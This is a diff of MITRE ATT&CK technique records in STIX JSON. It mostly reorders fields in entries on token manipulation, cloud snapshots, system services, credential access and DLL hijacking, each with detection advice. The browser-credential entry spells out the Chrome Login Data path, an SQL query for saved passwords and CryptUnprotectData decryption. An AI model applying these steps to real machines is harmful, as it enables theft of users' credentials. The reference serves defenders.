"created": "2020-02-18T16:48:56.582Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "Windows User Account Control",
+ "System access controls",
+ "File system access controls"
],
+ "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Access tokens",
"API monitoring"
],
- "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
- "x_mitre_defense_bypassed": [
- "Windows User Account Control",
- "System access controls",
- "File system access controls"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.001",
+ "url": "https://attack.mitre.org/techniques/T1578/001"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ },
+ {
+ "source_name": "AWS Cloud Trail Backup API",
+ "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html",
+ "description": "Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020."
+ },
+ {
+ "source_name": "Azure - Monitor Logs",
+ "url": "https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor",
+ "description": "Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020."
+ },
+ {
+ "source_name": "Cloud Audit Logs",
+ "url": "https://cloud.google.com/logging/docs/audit#admin-activity",
+ "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020."
+ },
+ {
+ "source_name": "GCP - Creating and Starting a VM",
+ "url": "https://cloud.google.com/compute/docs/instances/create-start-instance#api_2",
+ "description": "Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Create Snapshot",
+ "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)",
+ "id": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-19T14:45:59.618Z",
+ "created": "2020-06-09T15:33:13.563Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)",
+ "x_mitre_data_sources": [
+ "GCP audit logs",
+ "Stackdriver logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs"
+ ],
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
+ },
+ {
+ "created": "2020-01-10T16:03:18.865Z",
+ "modified": "2020-03-25T22:32:16.537Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5",
+ "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ",
+ "name": "Create or Modify System Process",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5128,26 +5387,6 @@
"source_name": "OSX Malware Detection"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Create or Modify System Process",
- "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ",
- "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-25T22:32:16.537Z",
- "created": "2020-01-10T16:03:18.865Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -5262,16 +5501,6 @@
],
"modified": "2020-03-24T21:29:13.565Z",
"created": "2020-02-11T19:01:15.930Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
"x_mitre_data_sources": [
"Windows event logs",
"Process monitoring",
@@ -5279,6 +5508,16 @@
"DLL monitoring",
"Binary file metadata",
"API monitoring"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -5310,6 +5549,20 @@
],
"modified": "2020-03-29T20:35:36.694Z",
"created": "2020-02-11T18:39:59.959Z",
+ "x_mitre_contributors": [
+ "Diogo Fernandes",
+ "Anastasios Pingios"
+ ],
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Office 365 account logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5320,23 +5573,18 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Office 365 account logs"
- ],
- "x_mitre_contributors": [
- "Diogo Fernandes",
- "Anastasios Pingios"
]
},
{
+ "created": "2020-02-04T12:52:13.006Z",
+ "modified": "2020-03-25T18:30:10.630Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc",
"description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)",
"name": "Credentials In Files",
@@ -5371,33 +5619,6 @@
"description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-25T18:30:10.630Z",
- "created": "2020-02-04T12:52:13.006Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_system_requirements": [
- "Access to files"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
- ],
- "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "File monitoring"
- ],
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)"
- ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5405,9 +5626,43 @@
"AWS",
"GCP",
"Azure"
- ]
+ ],
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "File monitoring"
+ ],
+ "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_system_requirements": [
+ "Access to files"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-02-11T18:48:28.456Z",
+ "modified": "2020-03-25T18:40:15.564Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
+ "name": "Credentials from Password Stores",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5415,22 +5670,6 @@
"url": "https://attack.mitre.org/techniques/T1555"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Credentials from Password Stores",
- "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
- "id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-25T18:40:15.564Z",
- "created": "2020-02-11T18:48:28.456Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5491,6 +5730,22 @@
"created": "2019-06-17T19:34:51.855Z"
},
{
+ "created": "2020-02-12T18:57:36.041Z",
+ "modified": "2020-02-17T13:20:02.386Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData \u200eApril 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
+ "name": "Credentials from Web Browsers",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5523,22 +5778,6 @@
"description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Credentials from Web Browsers",
- "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData \u200eApril 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
- "id": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-02-17T13:20:02.386Z",
- "created": "2020-02-12T18:57:36.041Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5647,27 +5886,27 @@
],
"modified": "2020-02-07T20:49:18.834Z",
"created": "2020-02-04T12:58:40.678Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."
],
- "x_mitre_contributors": [
- "Sudhanshu Chauhan, @Sudhanshu_C"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Sudhanshu Chauhan, @Sudhanshu_C"
],
- "x_mitre_system_requirements": [
- "Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -5701,21 +5940,21 @@
],
"modified": "2020-03-23T23:30:46.546Z",
"created": "2019-12-03T14:25:00.538Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
@@ -5738,6 +5977,9 @@
"created": "2017-05-31T21:31:10.314Z"
},
{
+ "created": "2017-05-31T21:30:31.197Z",
+ "modified": "2020-03-30T20:17:22.024Z",
+ "type": "attack-pattern",
"revoked": true,
"id": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
"name": "Custom Cryptographic Protocol",
@@ -5762,10 +6004,7 @@
"description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
"source_name": "University of Birmingham C2"
}
- ],
- "type": "attack-pattern",
- "modified": "2020-03-30T20:17:22.024Z",
- "created": "2017-05-31T21:30:31.197Z"
+ ]
},
{
"external_references": [
@@ -5851,20 +6090,20 @@
],
"modified": "2020-03-24T20:46:23.547Z",
"created": "2020-02-11T18:45:34.293Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
],
"x_mitre_data_sources": [
"Windows event logs"
],
- "x_mitre_contributors": [
- "Vincent Le Toux"
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -5918,6 +6157,30 @@
"created": "2017-05-31T21:30:40.604Z"
},
{
+ "created": "2020-03-13T18:11:08.357Z",
+ "modified": "2020-03-26T16:13:58.862Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. 
In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\nPrograms that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
+ "name": "DLL Search Order Hijacking",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5960,30 +6223,6 @@
"description": "Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "DLL Search Order Hijacking",
- "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. 